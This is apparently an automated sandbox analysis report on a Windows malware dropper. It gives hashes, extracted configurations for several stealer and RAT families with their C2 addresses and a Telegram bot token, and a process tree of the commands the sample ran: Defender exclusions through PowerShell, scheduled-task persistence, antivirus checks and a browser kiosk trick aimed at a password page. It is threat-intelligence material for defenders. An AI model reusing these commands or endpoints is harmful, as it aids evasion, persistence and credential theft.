Resubmissions

28-11-2024 02:19

241128-cr9sks1kht 10

27-11-2024 21:08

241127-zyzyaawqgn 10

27-11-2024 20:16

241127-y145caymbs 10

27-11-2024 20:13

241127-yzlxdavlen 10

27-11-2024 19:53

241127-yl61dsxpcs 10

27-11-2024 19:38

241127-ycrjcaxkfx 10

27-11-2024 19:03

241127-xqsswsslej 10

27-11-2024 19:03

241127-xqf44aslcr 3

27-11-2024 19:02

241127-xpxqfsslan 3

27-11-2024 18:32

241127-w6pkqs1mek 10

Analysis

  • max time kernel
    282s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 23:19

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

62.113.117.95:4449

Mutex

hwelcvbupaqfzors

Attributes
  • delay

    10

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://servicedny.site

https://authorisev.site

https://faulteyotk.site

https://dilemmadu.site

https://contemteny.site

https://goalyfeastz.site

https://opposezmny.site

https://seallysl.site

Extracted

Family

vidar

Version

10.6

Botnet

1a72eb06939ea478753d5c4df4b2bd32

C2

https://steamcommunity.com/profiles/76561199747278259

https://t.me/armad2a

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36

Extracted

Family

phorphiex

C2

http://185.215.113.84

http://185.215.113.66

Extracted

Family

xworm

Version

3.1

C2

needforrat.hopto.org:7000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

xworm

Version

3.0

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/ct3KF8KR

  • telegram

    https://api.telegram.org/bot6705170780:AAFLOXrnAOxDhNu3tap1IE119Otvgco_CbY/sendMessage?chat_id=6084847021

Extracted

Family

redline

C2

38.180.72.54:42814

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6705170780:AAFLOXrnAOxDhNu3tap1IE119Otvgco_CbY/sendMessage?chat_id=6084847021

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • BabbleLoader

    BabbleLoader is a malware loader written in C++.

  • Babbleloader family
  • Detect PurpleFox Rootkit 5 IoCs

    Detect PurpleFox Rootkit.

  • Detect Vidar Stealer 5 IoCs
  • Detect Xworm Payload 4 IoCs
  • Detects BabbleLoader Payload 1 IoCs
  • Gh0st RAT payload 5 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Purplefox family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 62 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 39 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 61 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3512
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\xxxx.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4392
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:2560
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1124
          • C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\RedSystem.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2312
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1576
              4⤵
              • Program crash
              PID:5116
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1584
              4⤵
              • Program crash
              PID:4512
          • C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1620
          • C:\Users\Admin\AppData\Local\Temp\Files\r.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4976
            • \??\c:\windows\SysWOW64\svchost.exe
              c:\windows\system32\svchost.exe
              4⤵
                PID:4112
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 896
                4⤵
                • Program crash
                PID:2044
            • C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe"
              3⤵
              • Executes dropped EXE
              PID:2428
            • C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:60
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3712
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:384
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "wrsa.exe opssvc.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2896
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  5⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3320
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3412
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 229536
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1520
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "ReprintVerificationMercyRepository" Elliott
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:5080
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b Exhibit + Rand + Hours 229536\U
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2936
                • C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif
                  229536\Webster.pif 229536\U
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:552
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif" & rd /s /q "C:\ProgramData\CAFBGHIDBGHJ" & exit
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:5196
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 10
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:1032
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 5
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:752
            • C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
              3⤵
              • Executes dropped EXE
              PID:4592
            • C:\Users\Admin\AppData\Local\Temp\Files\GOLD1234.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\GOLD1234.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3092
              • C:\Users\Admin\AppData\Local\Temp\Files\GOLD1234.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\GOLD1234.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:692
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 264
                4⤵
                • Program crash
                PID:4120
            • C:\Users\Admin\AppData\Local\Temp\Files\s.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:2536
              • C:\Windows\sysnldcvmr.exe
                C:\Windows\sysnldcvmr.exe
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2836
                • C:\Users\Admin\AppData\Local\Temp\1825426327.exe
                  C:\Users\Admin\AppData\Local\Temp\1825426327.exe
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:432
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                    6⤵
                      PID:5160
                      • C:\Windows\system32\reg.exe
                        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        7⤵
                          PID:5292
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                        6⤵
                          PID:5336
                          • C:\Windows\system32\schtasks.exe
                            schtasks /delete /f /tn "Windows Upgrade Manager"
                            7⤵
                              PID:5308
                        • C:\Users\Admin\AppData\Local\Temp\228114122.exe
                          C:\Users\Admin\AppData\Local\Temp\228114122.exe
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5108
                          • C:\Users\Admin\AppData\Local\Temp\3514336798.exe
                            C:\Users\Admin\AppData\Local\Temp\3514336798.exe
                            6⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            PID:5476
                        • C:\Users\Admin\AppData\Local\Temp\91028654.exe
                          C:\Users\Admin\AppData\Local\Temp\91028654.exe
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5612
                        • C:\Users\Admin\AppData\Local\Temp\3154430135.exe
                          C:\Users\Admin\AppData\Local\Temp\3154430135.exe
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5424
                          • C:\Users\Admin\AppData\Local\Temp\2151724122.exe
                            C:\Users\Admin\AppData\Local\Temp\2151724122.exe
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:5888
                    • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
                      "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1392
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM firefox.exe /T
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1544
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM chrome.exe /T
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3504
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM msedge.exe /T
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3152
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM opera.exe /T
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1172
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM brave.exe /T
                        4⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1000
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                        4⤵
                          PID:4132
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                            5⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            PID:3792
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0d4406a-cc88-4f50-a7a3-a6b197ed226b} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" gpu
                              6⤵
                                PID:3100
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2384 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c374ca9-56d9-4584-9cef-1e7d5a3dcecf} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" socket
                                6⤵
                                  PID:2172
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3116 -prefMapHandle 3340 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1c90755-1ff1-4d4b-afc9-f6ffeb150e70} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" tab
                                  6⤵
                                    PID:5052
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4044 -childID 2 -isForBrowser -prefsHandle 4036 -prefMapHandle 4032 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8666d953-af9e-4f9c-9d21-7dbb02ef4613} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" tab
                                    6⤵
                                      PID:4740
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1540 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4848 -prefMapHandle 5048 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8d85abb-1fab-4784-8dec-b63d03018ac4} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" utility
                                      6⤵
                                      • Checks processor information in registry
                                      PID:5820
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f502bf5-8fd4-41ea-81db-9bbf5d32f5bf} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" tab
                                      6⤵
                                        PID:5836
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 4 -isForBrowser -prefsHandle 5620 -prefMapHandle 5616 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39f7ca70-2260-4b25-ae65-15768a256738} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" tab
                                        6⤵
                                          PID:6140
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5628 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {759900dd-df0c-4461-a10d-1f177858eefa} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" tab
                                          6⤵
                                            PID:4976
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2596 -parentBuildID 20240401114208 -prefsHandle 2220 -prefMapHandle 3048 -prefsLen 29278 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {985005f1-1fdd-475d-8884-4cfda254cf99} 3792 "\\.\pipe\gecko-crash-server-pipe.3792" gpu
                                            6⤵
                                              PID:5192
                                      • C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:5964
                                      • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:2032
                                      • C:\Users\Admin\AppData\Local\Temp\Files\new.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\new.exe"
                                        3⤵
                                        • Checks computer location settings
                                        • Drops startup file
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1540
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5772
                                      • C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • System Location Discovery: System Language Discovery
                                        PID:3172
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                          4⤵
                                            PID:5164
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            4⤵
                                              PID:5328
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                              4⤵
                                                PID:5404
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5380
                                                • C:\Users\Admin\AppData\Roaming\L0R0CluXu9.exe
                                                  "C:\Users\Admin\AppData\Roaming\L0R0CluXu9.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:5088
                                                • C:\Users\Admin\AppData\Roaming\WlFnC9H29d.exe
                                                  "C:\Users\Admin\AppData\Roaming\WlFnC9H29d.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4732
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 276
                                                4⤵
                                                • Program crash
                                                PID:3236
                                            • C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe"
                                              3⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:4028
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:5152
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1092
                                            • C:\Users\Admin\AppData\Local\Temp\Files\dlhost.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\dlhost.exe"
                                              3⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              PID:5600
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\dlhost.exe'
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:5972
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe'
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:5580
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dlhost.exe'
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:3312
                                              • C:\Windows\System32\schtasks.exe
                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\Admin\AppData\Local\Temp\dlhost.exe"
                                                4⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:1524
                                            • C:\Users\Admin\AppData\Local\Temp\Files\svchot.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\svchot.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops file in System32 directory
                                              • System Location Discovery: System Language Discovery
                                              PID:5204
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\Files\svchot.exe > nul
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                PID:3172
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping -n 2 127.0.0.1
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  • Runs ping.exe
                                                  PID:1796
                                            • C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:5564
